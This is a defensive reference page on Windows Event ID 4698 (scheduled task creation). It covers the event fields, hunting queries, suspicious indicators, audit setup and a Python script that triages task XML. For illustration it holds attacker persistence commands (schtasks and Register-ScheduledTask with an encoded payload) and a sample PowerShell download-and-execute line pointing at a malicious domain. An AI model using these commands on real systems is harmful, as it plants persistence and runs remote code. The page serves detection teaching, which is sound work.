Windows Event ID 4698
One-liner: A Windows Security log event written when a new scheduled task is registered; one of the most useful single events for catching persistence planted by an attacker.
🎯 What Is It?
Windows Event ID 4698 is written to the Security log when a new scheduled task is registered on a Windows system, whether through the Task Scheduler GUI, schtasks.exe, the PowerShell ScheduledTasks module, the COM API, or remotely over RPC. Attackers abuse scheduled tasks to:
- Maintain persistence: run malware again at boot, at logon, or on a timer
- Execute payloads: run commands at a chosen time or interval
- Blend in: a task hidden among the hundreds of legitimate Microsoft tasks, often running as SYSTEM, looks like routine maintenance
- Establish C2: beacon to a command-and-control server on a fixed schedule
Channel: Security
MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task
Prerequisite: Requires the "Audit Other Object Access Events" subcategory (Object Access category) to be enabled; without it none of 4698-4702 is written, regardless of how the task was created.
🔬 How It Works
Event Details
```xml
<Event>
  <System>
    <EventID>4698</EventID>
    <Channel>Security</Channel>
    <Computer>WKSTN-1.domain.local</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">attacker</Data>
    <Data Name="SubjectDomainName">DOMAIN</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TaskName">\Windows Update</Data>
    <Data Name="TaskContent">
      <!-- Full XML of the scheduled task, stored as escaped text.
           It starts with its own <?xml version="1.0" encoding="UTF-16"?> declaration
           and contains the Triggers, Principals and Actions elements. -->
    </Data>
  </EventData>
</Event>
```
Key Fields
| Field | Description |
|---|---|
| SubjectUserName / SubjectDomainName | Account that registered the task |
| SubjectLogonId | Logon session of that account; join to 4624 to see how the account logged on (interactive, network, RDP) |
| TaskName | Full path of the task in the Task Scheduler tree (e.g. `\Windows Update` at the root, or `\Microsoft\Windows\...` for built-in tasks) |
| TaskContent | Full XML definition of the task: triggers, the principal it runs as, run level, and the Exec command and arguments |
Common Attacker Techniques
```powershell
# Command Prompt (schtasks.exe): run every minute from a temp directory
schtasks /create /tn "Windows Update" /tr "C:\Windows\Temp\malware.exe" /sc minute /mo 1
# PowerShell ScheduledTasks module: run encoded PowerShell at startup
Register-ScheduledTask -TaskName "Updater" -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-enc <payload>")
```
🕵️ Detection & Hunting
KQL Query (from THM Threat Hunting Foothold)
This is Kibana Query Language (Elastic), not Kusto. The bare wildcard terms are free-text searches, so they also match `schtasks` or `Register-ScheduledTask` in `process.command_line` of process-creation events, which pairs the Security event with the process that caused it.
```
host.name: WKSTN-* AND (winlog.event_id: 4698 OR (*schtasks* OR *Register-ScheduledTask*))
```
Key Columns to Add
- winlog.computer_name
- user.name
- process.command_line
- winlog.event_id
- winlog.event_data.TaskName
Suspicious Indicators
| Indicator | Why It's Suspicious |
|---|---|
| Task executing from %TEMP%, %APPDATA%, C:\Users\Public | Unusual, user-writable execution location |
| Task name mimicking Windows tasks (e.g. "Windows Update" at the root of the tree instead of under \Microsoft\Windows) | Masquerading |
| Encoded PowerShell (`-enc`, `-EncodedCommand`) in task action | Obfuscated payload; decode the Base64 UTF-16LE string to see what it runs |
| Frequent execution (every minute) | C2 beaconing pattern |
| Task registered by a non-admin account that runs as SYSTEM, as another user, or with RunLevel HighestAvailable | Privilege escalation or misuse of stolen credentials |
| External URLs in task action | Downloading remote payloads |
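The key fields and the indicator table above are only useful once TaskContent has been parsed: the command, its arguments, the repetition interval and the run level all live inside that embedded XML. The script below is an added example written for this page, not code from THM or from Microsoft. It builds a constructed 4698 event modelled on the THM example (the domain `oneedirve.xyz` is taken from the page; the encoded payload, SIDs and timestamps are invented), extracts TaskContent, parses the Task Scheduler XML, decodes a `-enc` argument, and applies the indicator checks as a triage score. The thresholds and the masquerading heuristic are this example's own choices.

```python
"""Triage a Windows Security Event ID 4698 by parsing its embedded TaskContent XML."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def _b64_utf16(cmd):
    """Encode a command the way PowerShell -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample: a task that downloads from the page's malicious domain every minute.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://www.oneedirve.xyz/a.ps1')"
SAMPLE_TASK = f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT1M</Interval></Repetition>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-w hidden -enc {_b64_utf16(PAYLOAD)}</Arguments></Exec></Actions>
</Task>"""
# Constructed 4698 event; TaskContent carries the task XML as escaped text, as Windows does.
SAMPLE_EVENT = f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Channel>Security</Channel>
    <Computer>WKSTN-1.domain.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">attacker</Data>
    <Data Name="SubjectDomainName">DOMAIN</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TaskName">\\Windows Update</Data>
    <Data Name="TaskContent">{escape(SAMPLE_TASK)}</Data>
  </EventData>
</Event>"""


def parse_event(event_xml):
    """Return the EventData fields of a Security event plus the Computer name."""
    root = ET.fromstring(event_xml)
    fields = {d.get("Name"): (d.text or "") for d in root.findall("./e:EventData/e:Data", EVT_NS)}
    fields["Computer"] = root.findtext("./e:System/e:Computer", default="", namespaces=EVT_NS)
    return fields


def parse_task_content(task_xml):
    """Pull command, arguments, repetition interval and principal out of the task XML."""
    # The embedded document declares encoding="UTF-16" but we hold it as a str; expat
    # rejects that mismatch, so strip the XML declaration before parsing.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml).strip())

    def text(path):
        node = root.find(path, TASK_NS)
        return (node.text or "").strip() if node is not None else ""

    return {"command": text(".//t:Actions/t:Exec/t:Command"),
            "arguments": text(".//t:Actions/t:Exec/t:Arguments"),
            "interval": text(".//t:Repetition/t:Interval"),
            "user_id": text(".//t:Principals/t:Principal/t:UserId"),
            "run_level": text(".//t:Principals/t:Principal/t:RunLevel")}


ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(arguments):
    """Decode a PowerShell -EncodedCommand argument, or return None if there is none."""
    m = ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


URL_RE = re.compile(r"https?://[\w.-]+", re.I)
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "%temp%", "%appdata%")


def triage(event_xml):
    """Apply the page's suspicious-indicator checks to one 4698 event."""
    data = parse_event(event_xml)
    task = parse_task_content(data["TaskContent"])
    decoded = decode_encoded_command(task["arguments"])
    action = " ".join(filter(None, [task["command"], task["arguments"], decoded]))
    name = data["TaskName"]
    hits = []
    # Heuristic: a root-level task whose name drops the word "Windows" (built-in ones live under \Microsoft\Windows\).
    if name.count("\\") == 1 and "windows" in name.lower():
        hits.append("root-level task name masquerading as a Windows task")
    if any(d in action.lower() for d in USER_WRITABLE):
        hits.append("action runs from a user-writable directory")
    if decoded is not None:
        hits.append("encoded PowerShell action")
    m = re.fullmatch(r"PT(\d+)M", task["interval"])
    if m and int(m.group(1)) <= 5:
        hits.append(f"repeats every {m.group(1)} minute(s): beacon-like")
    hits.extend(f"external URL in action: {u}" for u in URL_RE.findall(action))
    if task["user_id"] == "S-1-5-18" or task["run_level"] == "HighestAvailable":
        hits.append("runs as SYSTEM or with highest privileges")
    return {"computer": data["Computer"], "subject": f"{data['SubjectDomainName']}\\{data['SubjectUserName']}",
            "task_name": name, "command": task["command"], "arguments": task["arguments"],
            "decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_EVENT).items():
        print(f"{k}: {v}")
```

On a real host the same functions apply to the XML returned by `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698}` piped through `.ToXml()`, or to the `winlog.event_data.TaskContent` field a SIEM has already extracted; the decoding step is what turns an opaque `-enc` blob into the URL you can block.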
Example from THM
Task Name: "Windows Update"
Action: PowerShell downloading from www[.]oneedirve[.]xyz
Schedule: Every minute
→ Clear indicator of malicious persistence
🔗 Related Event IDs
| Event ID | Description |
|---|---|
| 4698 | Scheduled task created (Security log) |
| 4699 | Scheduled task deleted (Security log) |
| 4700 | Scheduled task enabled (Security log) |
| 4701 | Scheduled task disabled (Security log) |
| 4702 | Scheduled task updated (Security log); noisy, because Windows rewrites its own tasks regularly |
| 106 | Task registered (Microsoft-Windows-TaskScheduler/Operational log) |
| 200 | Task action started (Microsoft-Windows-TaskScheduler/Operational log) |
| 201 | Task action completed (Microsoft-Windows-TaskScheduler/Operational log) |
The Task Scheduler Operational log is disabled by default on many Windows builds, so 106/200/201 are often absent unless it has been turned on; 4698 is the event you can count on once the audit subcategory is enabled.
🔧 Enabling the Audit
Via Group Policy
Computer Configuration
→ Windows Settings
→ Security Settings
→ Advanced Audit Policy Configuration
→ Audit Policies
→ Object Access
→ Audit Other Object Access Events: Success, Failure
Via Command Line
```cmd
auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:enable
auditpol /get /subcategory:"Other Object Access Events"
```
The second command confirms the setting took effect. When a domain GPO also sets audit policy, the GPO wins over a local auditpol change at the next refresh, so make the change in the GPO that applies to the endpoints.
🤔 Interview Angles
Common Questions
- "How do you detect malicious scheduled tasks?"
- "What Event ID tracks scheduled task creation?"
- "How do attackers use scheduled tasks for persistence?"
STAR Story
Situation: Endpoint was beaconing to an external domain every minute, but no obvious malware process was visible.
Task: Identify the persistence mechanism maintaining the C2 connection.
Action: Searched for Event ID 4698 and found a task named "Windows Update" created shortly after initial compromise. The TaskContent XML revealed a PowerShell command downloading from a malicious domain. Correlated with schtasks.exe execution in Sysmon logs.
Result: Identified and removed the persistence mechanism. Created detection rule for tasks executing encoded PowerShell or connecting to external URLs.
✅ Best Practices
- Enable "Audit Other Object Access Events" on all endpoints, and forward the Security log centrally
- Alert on scheduled task creation outside of change windows
- Monitor for tasks with suspicious names mimicking Windows tasks, especially at the root of the task tree
- Check TaskContent for encoded commands, external URLs, and principals that differ from the creating account
- Correlate with process creation (schtasks.exe, powershell.exe) via Sysmon Event ID 1 or Security Event ID 4688
❌ Common Misconceptions
- "Only admins can create scheduled tasks": any user can create tasks that run in their own context, so 4698 from a standard account is normal; the task's principal and run level are what matter
- "Scheduled tasks are always visible in the Task Scheduler GUI": attackers can hide tasks from the GUI, so hunt from the 4698 record rather than from the console
- "Event ID 4698 shows the command": the command is only inside the TaskContent XML, which has to be parsed
📚 Related Concepts
- Windows Event Logs
- Persistence (Cyber Security)
- MITRE ATT&CK
- Threat Hunting
- Sysmon Event IDs
- Defense Evasion
📖 References
- MITRE ATT&CK T1053.005 - Scheduled Task/Job: Scheduled Task: https://attack.mitre.org/techniques/T1053/005/
- Microsoft, "Audit Other Object Access Events" (Advanced security audit policy settings)
- SANS, Windows Security Event Log Reference